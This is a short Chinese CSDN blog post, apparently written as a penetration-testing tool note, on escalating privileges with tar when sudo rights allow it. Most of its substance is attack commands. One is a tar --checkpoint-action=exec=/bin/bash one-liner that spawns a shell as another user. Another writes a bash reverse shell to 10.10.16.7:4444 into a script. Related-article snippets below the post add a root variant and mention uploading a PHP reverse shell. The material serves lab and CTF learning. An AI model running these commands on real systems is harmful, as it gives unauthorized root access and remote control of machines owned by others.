tar提权

最新推荐文章于 2023-06-13 19:38:30 发布
最新推荐文章于 2023-06-13 19:38:30 发布
阅读量1.3k 收藏 1
点赞数
分类专栏: 工具手册 文章标签: 安全 渗透测试 linux shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57221101/article/details/122617107
版权

当某台机器给予tar sudo更高权限的时候可以尝试使用以下方式来提权

方法一

 sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash

借用tar检查点功能实现提权

-c 建立一个新的压缩文档

-f 指定压缩文档

--checkpoint=n 每写入n项记录进行一次检查点操作

--checkpoint-action每次到检查点时执行的操作,语法格式符合shell脚本

像上面我举出的例子意思就是每到一个检查点就放出一个onuma权限的窗口

同样写入其他的命令比如说

--checkpoint-action=exec=“echo 123”
--checkpoint-action=echo=123
--checkpoint-action=exec=“Hit %s checkpoint#%U”

方法二

把命令写入一个sh文件中,然后打包,让他显示操作过程

echo -e '#!/bin/bash\n\nbash -i >& /dev/tcp/10.10.16.7/4444 0>&1' > bmfx.sh

tar -cvf bmfx.tar bmfx.sh
彤彤学安全
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Tryhackme -Skynet(考点:smb & 密码爆破 & cuppa RFI & cronjob - tar提权
冬萍子癸水
05-27 537
1 扫描 忘了截图了,就是445 smb和80http,一个进去找敏感文件,另一个进去搜集信息。 2 web信息搜集 gobuster扫gobuster dir -u http://10.10.190.147 -w /root/directory-list-2.3-medium.txt -t 64 松鼠邮件那个进去后是登录框。但是不知道密码 3 smb利用 enum4linux -a Ip地址 看到有俩处,匿名的当然可以进,mile那个没密码。 进匿名看,再log里,看到很多密码似的,保存下来,可
nivek(tar提权
m0_66299232的博客
11-09 805
3.用-p提权上来发现euid变为了eren用户,那就可以进入用户目录,有一个backup.sh文件eren用户权限是可读可写可执行。7.在本地开启监听,尝试上传我们的php-reverse-shell.php(github里有),发现上传路径。2.寻找有suid执行权限的文件,发现有一个/bin/bash。4.把反弹shell的命令写入.sh文件中,等待反弹。1.用gobuster探测目录,没探测出来。5.成功登录进去,寻找可利用信息,和上传点。6.成功进入root,轻松拿下!点俩次放包,页面就进去了。
使用tar --checkpoint提权操作 详解--checkpoint-action的参数及作用
qq_33958714的博客
12-12 3392
如果管理员给予了某个普通用户tar命令的超级管理员操作: 那么我们可以使用tar命令进行提权,命令如下 sudo -u root tar cf /dev/null exploit --checkpoint=1 --checkpoint-action=exec="/bin/bash" -c:创建新的档案文件,相当于打包(-x,相反的操作,拆包) -f:使用档名,f之后直接加档名,中间不能加其他参数 --checkpoint=n:每写入n个记录之后设置一个检查点,在...
TRY HACK ME | Skynet「SMB信息搜集+TAR提权
AKAHRZ的博客
05-14 853
TRY HACK ME 渗透测试靶场,以基础为主层层深入,知识点讲解详细,对于想实现从零到一飞跃的白客,TRY HACK ME无非是最好的选择。而网络上资源良莠不齐,好的资源难找的一逼。因此,今天起我将与大家一起详细学习THM重要的ROOM里的内容,力求让每个人都能理解、掌握其中的内容,让我们一起学习、一起å进步、一起GET THE FLAG! THM靶场:Skynet「SMB信息搜集+TAR提权」THM靶场:SkynetSteelmountain 靶场通关小结 THM靶场:Skynet 这个房间是一.
exploit.tar(DC3靶机所需提权exp-1)
02-20
39772.zip
crasher.tar(DC3靶机所需提权exp-2)
02-20
DC3靶机所需提权exp
linux入侵提权(服务器提权)方法.docx
09-26
Linux入侵提权方法】 在Linux环境中,当攻击者获得了有限的系统权限后,往往寻求进一步提升至root权限,以获得对服务器的完全控制。本文将介绍两种常见的Linux提权方法:利用MySQL进行提权以及低权限用户的提权...
sudo-1.9.13p3.tar.gz
03-31
- 提权过程:在默认设置下,用户需要输入自己的密码来验证身份,然后才能执行sudo命令。 2. **sudo安全性**: - **权限最小化**:sudo的核心理念是限制用户的权限,只允许他们执行必要的任务,防止滥用或意外...
kafka_cluster.tar.gz
03-30
6. **设置权限**:在描述中提到,可能需要使用普通用户提权操作。在Ansible中,可以使用`become`指令切换到root权限执行某些命令,如修改文件权限或启动服务。 7. **扩展集群**:如果需要添加更多节点到集群,只需...
sudo提权
weixin_34356555的博客
09-26 351
参考文献:http://zone.secevery.com/article/989https://www.anquanke.com/post/id/158511 sudo概念: sudo (Substitute User and Do 的简写)临时授权,可以临时让其以root 权限运行某个程序。在/etc/s...
权限提升-linux提权手法总结
01-14
权限提升-linux提权手法总结
checkpoint_ep200.pth.tar
08-13
该文档为 行人重识别 Person Re-ID 数据集 Market1501 Baseline 200 epoch checkpoint
忆享科技戟星安全实验室|最全的Linux提权总结,赶紧收藏吧
m0_61431042的博客
09-23 1111
在日常渗透测试过程中,我们常常会先是拿到webshell,当我们权限过低时,我们需要提升权限进行下一步渗透,今天就来聊一下提权的方式有哪些。
linux利用定时任务提权
m0_63917373的博客
05-06 418
linux定时任务提权 linux提权
提权技巧(suid)
wanguixiu的博客
06-08 224
提权技巧(suid) 作者: admin 时间: 2021-05-27 分类: 权限提升 用以下命令查找find / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000 -print2>/dev/null下面的是利用方式,这里不全,每个含有suid权限的文件都可以...
linux定时任务打包提权&docker组提权
m0_62207170的博客
03-03 694
linux定时任务打包提权&docker组提权
Tar 命令参数详解
ewdeew的博客
04-13 1133
4.1、Tar 命令参数详解 -A, --catenate, --concatenate 将存档与已有的存档合并 -c, --create 建立新的存档 -d, --diff, --compare 比较存档与当前文件的不同之处 –delete 从存档中删除 -r, --append 附加到存档结尾 -t, --list 列出存档中文件的目录 -u, --update 仅将较新的文件附加到存档中 -...
20210424web渗透学习之命令注入提权的常见方法%ctf题目(通配符在野、tar、chown、rsync、ln)
qq_45290991的博客
04-24 1252
命令执行到提权 </h1> <div class="clear"></div> <div class="postBody"> <div id="cnblogs_post_body" class="blogpost-body blogpost-body-html"> Zedd / 2019-03-1...
linux 提权总结
weixin_51681694的博客
06-13 7210
会继续补充.....
nginx1.22.0离线安装
最新发布
02-04
离线安装nginx1.22.0可以通过以下步骤实现: 1. 首先,在需要安装nginx的服务器上下载nginx1.22.0的压缩包。可以从nginx官方网站或者其他可信的软件下载站点下载最新版本的nginx压缩包。 2. 下载完成后,将压缩包上传到服务器上的某个目录下,例如/home目录下。 3. 在终端中进入该目录,解压压缩包。使用以下命令进行解压: ``` tar -zxvf nginx-1.22.0.tar.gz ``` 4. 解压完成后,进入解压后的nginx目录。 ``` cd nginx-1.22.0 ``` 5. 在终端中执行以下命令进行编译和安装: ``` ./configure --prefix=/usr/local/nginx make sudo make install ``` 此命令将会在/usr/local/nginx目录下安装nginx。 6. 运行以下命令启动nginx服务: ``` sudo /usr/local/nginx/sbin/nginx ``` 如果遇到权限问题,可以使用```sudo```命令进行提权。 7. 使用浏览器访问服务器的IP地址或者域名,确认nginx安装成功。通常情况下,nginx默认监听80端口。 完成以上步骤后,你就成功地离线安装了nginx1.22.0版本。你可以根据需要进行相关配置来满足自己的需求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值